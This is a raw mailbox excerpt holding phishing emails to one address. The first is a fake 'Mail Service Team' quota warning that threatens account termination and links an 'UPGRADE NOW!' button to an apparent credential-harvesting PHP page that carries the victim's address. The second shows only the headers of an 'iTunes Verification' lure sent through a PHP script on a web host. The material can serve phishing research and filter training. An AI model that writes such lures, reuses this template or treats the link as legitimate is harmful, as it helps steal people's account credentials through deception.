From: "Email Service" <gso1_iea@afd.gov.bd>
Date: Thu, 13 Aug 2015 05:59:31 -0700
Reply-To: gerrald.harry@yahoo.com
Message-Id: <20150815043944.E97E815261AC@mail.afd.gov.bd>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 151

You will not see this in a MIME-aware mail reader.
--===============0824253712==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear jose@monkey.org,
   Your E-mail =93jose@monkey.org=94 Needs Extension !!   =

    4889MB	  111MB
    E-mail sent from jose@monkey.org  will temporarily not be delivered as =
Disc quota exceeded 95% remaining 5% unused space.   For this reason all in=
coming email with high massage size above 10kb will be discarded until your=
 email quota has been extended.   =

    =

    UPGRADE NOW!

 To automatically increase your email disc quota by 1GB to avoid account su=
spension.   Attention: Failure to do this will lead to Email Storage abuse =
and account termination.   Thanks, Mail Service Team.
--===============0824253712==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0p=
x; FONT: 16px 'Times New Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0=
px; WHITE-SPACE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,=
255,255)"><SPAN style=3D"COLOR: rgb(0,0,0)"><SPAN style=3D"BACKGROUND-COLOR=
: rgb(238,238,238)">Dear jose@monkey.org,<BR></SPAN></SPAN></DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"></SPAN>&nbsp;</DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-SIZE: 16pt">Your E-mail =E2=80=9Cjo=
se@monkey.org=E2=80=9D Needs<SPAN>&nbsp;</SPAN><SPAN>Extension !!</SPAN></S=
PAN></SPAN></DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"></SPAN>&nbsp;</DIV>
<TABLE style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px;=
 MARGIN: 0px; WORD-SPACING: 0px; FONT: 16px HelveticaNeue,'Helvetica Neue',=
Helvetica,Arial,'Lucida Grande',sans-serif; TEXT-TRANSFORM: none; TEXT-INDE=
NT: 0px; PADDING-TOP: 0px; WHITE-SPACE: normal; LETTER-SPACING: normal; BOR=
DER-COLLAPSE: separate; BACKGROUND-COLOR: rgb(255,255,255)" height=3D29 cel=
lSpacing=3D0 cellPadding=3D0 width=3D266 border=3D0>
<TBODY style=3D"WIDTH: 266px">
<TR style=3D"VERTICAL-ALIGN: inherit">
<TD style=3D"border-spacing: 2px" width=3D210 bgColor=3D#0099ff>
<DIV align=3Dcenter><SPAN style=3D"COLOR: rgb(0,0,0)">4889MB</SPAN></DIV></=
TD>
<TD style=3D"border-spacing: 2px" width=3D56 bgColor=3D#0000cc>
<DIV align=3Dcenter><SPAN style=3D"COLOR: rgb(0,0,0)">111MB</SPAN></DIV></T=
D></TR></TBODY></TABLE>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif"></SPAN><=
/SPAN>&nbsp;</DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif">&nbsp;E-=
mail sent from<SPAN> </SPAN></SPAN><B><SPAN style=3D"FONT-SIZE: 10pt">jose@=
monkey.org</SPAN></B><SPAN>&nbsp; </SPAN><SPAN style=3D"FONT-SIZE: 7.5pt"><=
SPAN></SPAN></SPAN><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif">will temp=
orarily not be delivered as Disc quota exceeded 95% remaining 5% unused spa=
ce.</SPAN></SPAN></DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif"></SPAN><=
/SPAN>&nbsp;</DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif">For this=
 reason all incoming email with high massage size above 10kb will be discar=
ded until your email quota has been extended.</SPAN></SPAN></DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif"><SPAN></=
SPAN><SPAN></SPAN></SPAN></SPAN>&nbsp;</DIV>
<TABLE style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px;=
 MARGIN: 0px; WORD-SPACING: 0px; FONT: 16px HelveticaNeue,'Helvetica Neue',=
Helvetica,Arial,'Lucida Grande',sans-serif; TEXT-TRANSFORM: none; TEXT-INDE=
NT: 0px; PADDING-TOP: 0px; WHITE-SPACE: normal; LETTER-SPACING: normal; BOR=
DER-COLLAPSE: separate" height=3D34 cellSpacing=3D0 cellPadding=3D0 width=
=3D144 bgColor=3D#cccccc border=3D0>
<TBODY style=3D"WIDTH: 144px">
<TR style=3D"VERTICAL-ALIGN: inherit">
<TD style=3D"border-spacing: 2px">
<TABLE style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px;=
 MARGIN: 0px; PADDING-TOP: 0px; BORDER-COLLAPSE: separate" height=3D24 cell=
Spacing=3D0 cellPadding=3D0 width=3D138 align=3Dcenter border=3D0>
<TBODY style=3D"WIDTH: 138px">
<TR style=3D"VERTICAL-ALIGN: inherit">
<TD style=3D"border-spacing: 2px" bgColor=3D#0099ff>
<DIV align=3Dcenter><SPAN style=3D"COLOR: rgb(0,0,0)"><A href=3D"http://lab=
omedishi.com/efeskillz/xi/conflict.php?rand=3D13InboxLightaspxn.1774256418&=
amp;fid.4.1252899642&amp;fid=3D1&amp;fav.1&amp;rand.13InboxLight.aspxn.1774=
256418&amp;fid.1252899642&amp;fid.1&amp;fav.1&amp;Email=3Djose@monkey.org&a=
mp;.rand=3D13InboxLight.aspx?n=3D1774256418&amp;fid=3D4#n=3D1252899642&amp;=
fid=3D1&amp;fav=3D129;?%3E" target=3D_blank>UPGRADE NOW<SPAN style=3D"BACKG=
ROUND-COLOR: rgb(243,243,243)"><SPAN></SPAN></SPAN>!</A><BR></SPAN></DIV></=
TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif">To autom=
atically increase your email disc quota by 1GB to avoid account suspension<=
SPAN>.</SPAN></SPAN></SPAN></DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif"></SPAN><=
/SPAN>&nbsp;</DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"><B><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif">Atten=
tion:</SPAN></B><SPAN style=3D"FONT-FAMILY: Tahoma,sans-serif"><SPAN>&nbsp;=
</SPAN>Failure to do this will lead to Email Storage abuse and account term=
ination.</SPAN></SPAN></DIV>
<DIV style=3D"MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FONT: 16px 'Times New=
 Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WHITE-SPACE: normal;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255)"><SPAN style=3D=
"COLOR: rgb(0,0,0)"></SPAN>&nbsp;</DIV>
<DIV style=3D"BACKGROUND: white; MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FO=
NT: 16px/14.4pt 'Times New Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT:=
 0px; WHITE-SPACE: normal; LETTER-SPACING: normal"><SPAN style=3D"COLOR: rg=
b(0,0,0)"><B>Thanks,</B><SPAN></SPAN></SPAN></DIV>
<DIV style=3D"BACKGROUND: white; MARGIN: 0in 0in 0pt; WORD-SPACING: 0px; FO=
NT: 16px/14.4pt 'Times New Roman',serif; TEXT-TRANSFORM: none; TEXT-INDENT:=
 0px; WHITE-SPACE: normal; LETTER-SPACING: normal"><SPAN style=3D"COLOR: rg=
b(0,0,0)"><B>Mail Service Team.</B></SPAN></DIV></BODY></HTML>
--===============0824253712==--

From nobody@host.adquet.com  Sun Aug 16 16:29:35 2015
Return-Path: <nobody@host.adquet.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 4353CF41C1
	for <jose@login.monkey.org>; Sun, 16 Aug 2015 16:29:35 -0500 (CDT)
Received: from smtpin18.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay02.b.hostedemail.com (Postfix) with SMTP id 02FC527AAAE
	for <jose@login.monkey.org>; Sun, 16 Aug 2015 21:29:35 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70527905910.18.smoke74_538ba1b4d7f28
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 89,8.8,0,7eb15a88f22972e7,d41d8cd98f00b204,nobody@host.adquet.com,:,RULES_HIT:2:41:46:72:150:153:355:375:379:800:962:967:973:983:988:989:1189:1208:1224:1260:1263:1313:1314:1345:1381:1431:1432:1433:1434:1437:1440:1516:1517:1535:1571:1593:1594:1730:1747:1777:1792:1803:2194:2198:2199:2200:2393:2525:2527:2538:2539:2549:2568:2629:2682:2685:2693:2731:2741:2827:2828:2859:2890:2891:2892:2894:2897:2900:2902:2906:2909:2910:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:2975:3000:3022:3138:3139:3140:3141:3142:3352:3804:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4120:4321:5007:6248:6261:6669:7903:8603:8957:9025:9121:9388:9416:9908:10049:10346:11026:11233:11289:11658:11783:11914:12043:12050:12051:12295:12438:12555:12698:12737:12891:12956:12958:12959:12961:13035:13255:14129:21067:21080,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:none,Custo
X-HE-Tag: smoke74_538ba1b4d7f28
X-Filterd-Recvd-Size: 9201
Received: from host.adquet.com (host.adquet.com [207.7.92.169])
	by imf26.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 16 Aug 2015 21:29:34 +0000 (UTC)
Received: from nobody by host.adquet.com with local (Exim 4.85)
	(envelope-from <nobody@host.adquet.com>)
	id 1ZR5Uj-0004S5-HL
	for jose@monkey.org; Sun, 16 Aug 2015 17:29:33 -0400
To: jose@monkey.org
Subject: [iTunes Verification] =?UTF-8?Q?=E2=9C=89_?= Last Reminder You Must Update Your Account Information =?UTF-8?Q?=E2=9C=94_?=
X-PHP-Script: adquet.com/site_images/website/wp-corm.php for 197.15.204.199, 197.15.204.199
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
